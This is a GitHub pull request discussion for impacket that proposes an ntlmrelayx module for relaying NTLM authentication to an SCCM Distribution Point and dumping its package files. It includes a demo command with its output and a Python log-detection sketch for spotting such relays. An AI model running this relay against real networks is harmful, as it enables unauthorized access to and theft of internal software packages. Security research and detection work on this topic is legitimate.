feat: ✨ Adding SCCM Distribution Point (HTTP) to NTLMRelayx #1790

Closed

Conversation

@ar0dd commented Aug 11, 2024

This PR adds an SCCM attack primitive presented at the Red Team Village in DEFCON32.

TL;DR - You can authenticate to the HTTP service of a Config Manager (SCCM) Distribution point, and extract all of the packages there.

This PR adds:

  • New --sccm module - You're able to NTLM relay to the HTTP service of the distribution point if authentication is enabled. If authentication is not enabled (Anonymous Authentication enabled), check out sccm-http-looter
  • modified ntlmrelayx.py in the examples scripts
  • Few other edits

I tried to follow the existing ADCS (ESC8-related) codebase that is in the master branch

Happy to make it more robust if needed. :)

Demo

└─# python3 examples/ntlmrelayx.py -t http://10.2.10.12/SMS_DP_SMSPKG$/Datalib --sccm --sccm-dp-dump -smb2support
Impacket v0.12.0.dev1+20240801.104651.6d8dd858 - Copyright 2023 Fortra

[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client DCSYNC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.2.10.13, attacking target http://10.2.10.12
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://10.2.10.12 as LUDUS/SCCM-SQL$ SUCCEED
[*] Dumping SCCM Distribution Point Files
[*] Getting Datalib listing...
[*] Getting Datalib listing from http://10.2.10.12/SMS_DP_SMSPKG$/Datalib...
[*] Data saved to 10.2.10.12_sccm_dump/Datalib.txt
[*] Extracting file names from Datalib listing...
[*] Getting file signatures...
[*] All targets processed!
[*] SMBD-Thread-7 (process_request_thread): Connection from 10.2.10.13 controlled, but there are no more targets left!
[*] SCCM DP Looting complete!

Signed-off-by: ar0dd <42455358+ar0dd@users.noreply.github.com>
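From the Distribution Point's side, the relay in the demo above shows up as a request to the `SMS_DP_SMSPKG$` virtual directory authenticated as a machine account (`LUDUS\SCCM-SQL$`) but arriving from an IP that is not that machine's. The following detection sketch is an added example, not code from this PR or from impacket: it parses constructed IIS-style log lines (the field order and the account-to-IP inventory are assumptions) and flags DP requests where the authenticated machine account does not belong to the client IP.

```python
"""Added example (not part of the PR): flag SCCM DP requests whose
NTLM-authenticated machine account does not match the requesting IP,
which is how a relayed authentication looks in the DP's IIS logs."""
import re

# Constructed IIS W3C-style lines; assumed field order:
# date time c-ip cs-username cs-method cs-uri-stem sc-status
SAMPLE_LOG = """\
2024-08-11 10:00:01 10.2.10.13 LUDUS\\SCCM-SQL$ GET /SMS_DP_SMSPKG$/Datalib 200
2024-08-11 10:00:02 10.2.10.50 LUDUS\\WS01$ GET /SMS_DP_SMSPKG$/ABC00001/file.cab 200
2024-08-11 10:00:03 10.2.10.99 LUDUS\\SCCM-SQL$ GET /SMS_DP_SMSPKG$/Datalib 200
2024-08-11 10:00:04 10.2.10.99 LUDUS\\SCCM-SQL$ GET /SMS_DP_SMSPKG$/Datalib/ABC00001.INI 200
"""

# Constructed inventory: which IPs each machine account is expected to
# authenticate from (in practice built from DNS/DHCP or the CM database).
EXPECTED_IP = {
    "LUDUS\\SCCM-SQL$": {"10.2.10.13"},
    "LUDUS\\WS01$": {"10.2.10.50"},
}

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\S+) (\d{3})$")


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not fit the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    date, time, c_ip, user, method, uri, status = m.groups()
    return {"ts": f"{date} {time}", "c_ip": c_ip, "user": user,
            "method": method, "uri": uri, "status": int(status)}


def is_machine_account(user):
    # Computer accounts end in '$' (LUDUS\SCCM-SQL$ in the demo output).
    return user.endswith("$")


def find_relay_suspects(log_text, expected_ip):
    """Return (ts, user, c_ip, uri) for requests to the DP content share
    made with a machine account from an IP not recorded for that account."""
    hits = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None or not rec["uri"].upper().startswith("/SMS_DP_SMSPKG$"):
            continue
        if not is_machine_account(rec["user"]):
            continue
        if rec["c_ip"] not in expected_ip.get(rec["user"], set()):
            hits.append((rec["ts"], rec["user"], rec["c_ip"], rec["uri"]))
    return hits
```

Hits are leads, not verdicts: the account-to-IP inventory has to be current, and a host that changed address will trip the same rule, so corroborate with the logon events on the host whose account was used.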
@anadrianmanrique anadrianmanrique self-assigned this Sep 19, 2024
@anadrianmanrique anadrianmanrique added the in review This issue or pull request is being analyzed label Oct 3, 2024
@anadrianmanrique (Contributor) commented

Hi @ar0dd! Regarding #1832, do you think it could be improved based on the implementation of this PR? I think it would be nice if you could provide feedback on that implementation, as some of that code was inspired by yours. Let me know your thoughts. Thank you!

@anadrianmanrique anadrianmanrique added waiting for response Further information is needed from people who opened the issue or pull request medium Medium priority item and removed in review This issue or pull request is being analyzed labels Oct 28, 2024
@ar0dd (Author) commented Oct 31, 2024

Hi @anadrianmanrique ,

I don't see anything wrong with their implementation.

I drew inspiration from this one so it could be easier for you guys to merge in: #1425

Right now it seems like #1832 and I are pulling DP files two different ways. Ideally we would use both methods (check for one - if that doesn't work, use signatures).

Up to you guys. I'm not married to my PR and I don't care for the credit.

Whatever you guys need to do and whatever is best for impacket works for me :)

This research was originally done by Erik Hunstad from badsectorlabs.

@anadrianmanrique (Contributor) commented

Thank you for your feedback! Merged on #1832
